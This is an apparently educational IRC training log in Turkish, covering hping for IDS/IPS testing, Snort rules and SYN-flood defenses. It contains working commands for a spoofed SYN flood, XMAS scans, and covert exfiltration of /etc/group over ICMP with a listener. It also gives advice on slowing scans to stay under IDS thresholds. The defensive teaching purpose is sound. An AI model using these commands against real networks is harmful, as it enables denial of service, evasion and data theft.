huzeyfe_onalevet.[22:27-07/13]
huzeyfe_onaldiyebiliriz
huzeyfe_onalbaska yolu var mi ben bilmiyorum.
.....
huzeyfe_onallinuX2da timestamp engelleme
huzeyfe_onalecho 0 >/proc/sys/net/ipv4/tcp_timestamps[22:32-07/13]
huzeyfe_onalyaparsak uptime suresi gorunmez olur
.....
--------------------------------------------------------------------------------------------------
Soru:
alee# hping -S --rand-source 192.168.1.3 -p 445  -I eth0 --flood  normalde
bunu bi firewall'a uygularsak ve firewall'in hicbir portu acik diilse
ise yarar mi[22:28-07/13]
huzeyfe_onalyaramaz
huzeyfe_onalzdenilebilir
huzeyfe_onalcok sayida gonderip mesgul edebilir firewallu
aleepeki normalde firewall lar bole bi saldiriya nasil engel oluyolar
huzeyfe_onalzira geriye rst paketi donecektir her istek icin
aleeyani herhangibir porttan saniyede bilmem kac syn alirsan "hoooopp"
diyecek bi sistemleri yokmu
huzeyfe_onalacik olursa gonderilen syn paketleri icin syn ack cevabi
gonderip bir muddet bekleyecek[22:29-07/13]
huzeyfe_onalhepsi farkli iplerden geliyor isteklerin.
aleeama ayni porta
huzeyfe_onalo zaman adam amacina ulasmis olur
huzeyfe_onalgercekten o porta ulasmak isteyenlerde ulasamaz
aleeoda dogru ya
--------------------------------------------------------------------------------------------------
Soru:
talkieeemicrosoft / google / yahoo gibi devler ne yapiyor? stateful
firewall mi
aleetalkieee supersin
huzeyfe_onalbenim evdeki firewallumda statefull :)
huzeyfe_onalyani olmayan yok
huzeyfe_onalama syn flood'u engellemenin cesitli yollari var.
talkieeeengelliyomu stateful yani ?
huzeyfe_onaltam degil.[22:31-07/13]
huzeyfe_onalyani stateful olmasi cok onemli degil.
huzeyfe_onalher halukarda gelen syn paketlerini incelemeye alacak ve cevap
donecek.
--------------------------------------------------------------------------------------------------
huzeyfe_onalIDS/IPS Testlerinde Hping Kullanımı
huzeyfe_onalkonusuna geciyoruz ...
huzeyfe_onalids nasil test edilir?
huzeyfe_onalids uzerinde yuklu kurallari ids'e gondererek:)
huzeyfe_onalen saglikli test budur.
huzeyfe_onalbunun icin Ftester cok ise yarar
huzeyfe_onalama hping'de asagi kalmaz
huzeyfe_onalneyse isimiz hping ile
huzeyfe_onalmesela klasik hping taramasini bir ids nasil gorur
huzeyfe_onal[**] [1:524:8] BAD-TRAFFIC tcp port 0 traffic [**]
huzeyfe_onal[Classification: Misc activity] [Priority: 3]
huzeyfe_onal07/12-20:08:00.723275 192.168.1.5:1222 -> 192.168.1.4:0
huzeyfe_onalTCP TTL:64 TOS:0x0 ID:966 IpLen:20 DgmLen:40
huzeyfe_onal******** Seq: 0x3D69F7AB  Ack: 0x41DBBD11  Win: 0x200  TcpLen:
20
huzeyfe_onalhedef sistemin 0. TCP portuna geliyor istek.
huzeyfe_onalgectik[22:34-07/13]
huzeyfe_onalmesela  exptest dosyasinda ids'i test edeek bir imza olsun
huzeyfe_onal# more exptest
huzeyfe_onal   GET /scripts/slxweb.dll/view?name=mainpage HTTP/1.0
huzeyfe_onalboyle bir HTTP paketi gordugunde ids bagiriyor olsun.
huzeyfe_onal# hping -P 192.168.1.3 -d 100 -p 80 -E exptest  -c  1
huzeyfe_onal-E ile dosyanin icerigini hedef sisteme gondeririz.
huzeyfe_onalids de tanimli bir imza ise bagirir.
huzeyfe_onalbaska , daha gercekci bir ornek verelim.
huzeyfe_onalAşağıdaki gibi bir Snort kuralımız olsun [22:36-07/13]
huzeyfe_onalalert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23 (msg:"TELNET
xyz exploit attempt"; flow:to_server; content:"bin/sh";
classtype:she
huzeyfe_onalllcode-detect; sid:1430; rev:7;)
huzeyfe_onalyani telnet oturumunda bin/sh stringi gecerse ids yakalasin ve
uyari versin.
huzeyfe_onal# cat snort_test
huzeyfe_onalbin/sh
huzeyfe_onalsnort_test dosyasinda bir satirlik bin/sh yazisi var
huzeyfe_onalbiz bunu hedef sisteme gondererek ids'imizin kuralini test
edecegiz.[22:37-07/13]
huzeyfe_onal# hping -n -c 1 -P 192.168.1.4 -p 23  -d 50 -E snort_test
huzeyfe_onal-d ile gonderilecek dosyanin boyutu belirlenir, -E ile dosyanin
icerigi gonderilir.
huzeyfe_onal-P TCP deki PUSH bayragı veri aktarimi icin
huzeyfe_onal--- 192.168.1.4 hping statistic ---
huzeyfe_onal1 packets tramitted, 0 packets received, 100% packet loss
huzeyfe_onalround-trip min/avg/max = 0.0/0.0/0.0 ms
huzeyfe_onalsimdi de Snort loglarina bakalim.[22:38-07/13]
huzeyfe_onal[**] [1:1430:7] TELNET xyz exploit attempt [**]
huzeyfe_onal[Classification: Executable code was detected] [Priority: 1]
huzeyfe_onal07/12-21:53:46.758684 192.168.1.5:2445 -> 192.168.1.4:23
huzeyfe_onalTCP TTL:64 TOS:0x0 ID:49841 IpLen:20 DgmLen:90
huzeyfe_onal****P*** Seq: 0x16AB9A80  Ack: 0x37A74B05  Win: 0x200  TcpLen:
20
huzeyfe_onalaynen dedigimiz gibi saldiri girisimini yakaladi/engelledi.
huzeyfe_onalTELNET xyz exploit attempt
huzeyfe_onalkurali yazarken bu saldiriyi yakaladiginda msg:"TELNET xyz
exploit attempt" mesaji versin demistik.
huzeyfe_onalBr ornek de Port taramalari ile ids'imizin kurallarini test
edelim.[22:39-07/13]
huzeyfe_onalMesela saldirganın XMAS Scan yaptığını düşünelim. Eğer IDS
sisteminiz düzgün yapılandırılmışsa bu saldırı tipini
rahatlıkla tanıyacaktır.
huzeyfe_onal#hping -FUP -n -p 22 192.168.1.4 -c 2
huzeyfe_onalHPING 192.168.1.4 (eth0 192.168.1.4): FPU set, 40 headers + 0
data bytes
huzeyfe_onalSnort’a düşen loglara bakalim.
huzeyfe_onal# tail -f /var/log/snort/alert
huzeyfe_onal**U*P**F Seq: 0x5DDA5952  Ack: 0x3220A1A8  Win: 0x200  TcpLen:
20 UrgPtr: 0x0
huzeyfe_onal[Xref => http://www.whitehats.com/info/IDS30]
huzeyfe_onal[**] [1:1228:7] SCAN nmap XMAS [**]
huzeyfe_onal[Classification: Attempted Information Leak] [Priority: 2]
huzeyfe_onal07/12-20:41:07.953181 192.168.1.5:2165 -> 192.168.1.4:22
huzeyfe_onalTCP TTL:64 TOS:0x0 ID:47151 IpLen:20 DgmLen:40
huzeyfe_onal**U*P**F Seq: 0x6C47BC04  Ack: 0x736BEDAF  Win: 0x200  TcpLen:
20 UrgPtr: 0x0
huzeyfe_onal[Xref => http://www.whitehats.com/info/IDS30]
huzeyfe_onalSCAN nmap XMAS [**]
huzeyfe_onalhemen tanidi:)[22:40-07/13]
huzeyfe_onalsoru var mi?
huzeyfe_onalHping ile Dosya Transferi konusuna gecip bitirecegim
huzeyfe_onalhping --rand-source kanal :)
--------------------------------------------------------------------------------------------------
Soru:
talkieee1. port taramalarini engellemenin etkili yolu ne 2. syn flood
engellemenin etk. yolu ne
talkieeesayin hocam
huzeyfe_onalisini bilen birinin yapacagi port taramalari  *engellenemez*.
[22:42-07/13]
talkieeeisini bilmeyenlerinki ?
aleebu isi bilenleride hicbisi engellemiyo canim
huzeyfe_onalacemi tarayicilarin yapacagi taramalari ids sistemleri ile
engellenebilir.
huzeyfe_onalmesela
huzeyfe_onalSnort'da su sekilde
AliAkguniþini bilen biri nasýl bir mantýkla yapýyor :)[22:43-07/13]
huzeyfe_onalbir confla yakalaybilirsiniz.
talkieeeheralde spoofingle
huzeyfe_onalsnort.conf'da
huzeyfe_onalscan_type { portscan portsweep decoy_portscan
distributed_portscan all }
huzeyfe_onalile hangi tarama turlerini izleyeceginiz belirtilir
huzeyfe_onalsonra gelen istegin port tarama mi normal bir istek mi
olacagina karar vermek icin[22:44-07/13]
huzeyfe_onalthreshold degerleri belirlenir.
huzeyfe_onalboylece normal istekler ile port taramalar ayirtedilebilir
huzeyfe_onalyoksa ids'ler kendilerinden anlamazlar boyle birseyi.
huzeyfe_onalsyn scan engelleme icin
huzeyfe_onalpopuler yontem
huzeyfe_onalsyn_cookie kullanimi
talkieeeAliAkgun sordugu soru ? bende merak ediyorum..[22:45-07/13]
huzeyfe_onaldetaylarini cok iyi bilmiyorum ama gercek bir flood'da cok
fayda vermiyor(tecrube ile sabit)
huzeyfe_onalisini bilen biri taradigi sistemin admininden daha iyi taniyor
o sistemleri:)
huzeyfe_onalhangi ids, hangi fw var nasil calsiiyor, ben nasil paketler
gonderirsem yer
huzeyfe_onalmesela soyle dusunelim[22:46-07/13]
huzeyfe_onalayni anda bir ip den 10'dan fazla istek gelirse IDS/IPS bunu
port tarama kabul etsin
huzeyfe_onalben de aynı anda 10 paket değil 2 ser paket 3 er paket
gonderirim
talkieee:D
huzeyfe_onalbiraz yavas olur ama amacima ulasirim
huzeyfe_onaldiger turlu sistem banlar beni.[22:47-07/13]
--------------------------------------------------------------------------------------------------
huzeyfe_onalHping ile Dosya Transferi
huzeyfe_onalkonusuna geciyoruz
huzeyfe_onalon soru:
huzeyfe_onaltcp kullanarak veri transferi yapmak icin ne gereklidir?
huzeyfe_onalccna kursuna gidenler bir ezberden soylesin bakalim:)
[22:48-07/13]
huzeyfe_onaltcp de veri aktarimi yapilmadan once oturum kurulmasi gerekir
denir
huzeyfe_onalhping kullanarak ip/icmp/tcp/udp uzerinden veri transferi
yapabiliriz.
huzeyfe_onalyani masum ping paketleri aslinda sirketinizden gizli verileri
kaciriyor olabilir:D[22:50-07/13]
huzeyfe_onalmesela Mesela bir hosttan diğerine /etc/group dosyasını icmp
ile gönderelim.
huzeyfe_onalGönderici Host
huzeyfe_onalda #hping --icmp 192.168.1.4 -d 200 --sign huzeyfe --file
/etc/group
huzeyfe_onalkomutunu verelim
huzeyfe_onalbu komut
huzeyfe_onal/etc/group dosyasini 192.168.1.4 'e huzeyfe on eki ile
gonderiyor
--------------------------------------------------------------------------------------------------
Soru:
talkieee--sign huzeyfe parametresi ne is yapiyor?
huzeyfe_onal> huzeyfe'yi bir nevi parola, tanitici gibi dusunebilirsiniz.
huzeyfe_onalalici taraf dosyayi bu ekle taniyacak:D
--------------------------------------------------------------------------------------------------
Soru:
Cronist-d 200 ne icin?
huzeyfe_onalgonderielcek veri boyutunu belirtiyoruz
huzeyfe_onalmax bu degerde diye
huzeyfe_onal:D
--------------------------------------------------------------------------------------------------
huzeyfe_onalDinleyici taraf
huzeyfe_onalda nasil bir komut verelim
huzeyfe_onal# hping --icmp  192.168.1.4 --listen huzeyfe[22:52-07/13]
huzeyfe_onalArada geçen trafiğe ait Tcpdump çıktısı
huzeyfe_onal2007-07-05 22:24:20.333750 IP 192.168.1.4 > 192.168.1.4: ICMP
echo request, id 29022, seq 6144, length 208
huzeyfe_onal        0x0000:  4500 00e4 b8da 0000 4001 3de6 c0a8 0104
E.......@.=.....
huzeyfe_onal        0x0010:  c0a8 0104 0800 900e 715e 1800 6875 7a65
........q^..huze
huzeyfe_onal        0x0020:  7966 6572 6f6f 743a 3a30 3a72 6f6f 740a
yferoot::0:root.
huzeyfe_onal        0x0030:  6269 6e3a 3a31 3a72 6f6f 742c 6269 6e2c
bin::1:root,bin,
huzeyfe_onal        0x0040:  6461 656d 6f6e 0a64 6165 6d6f 6e3a 3a32
daemon.daemon::2
huzeyfe_onal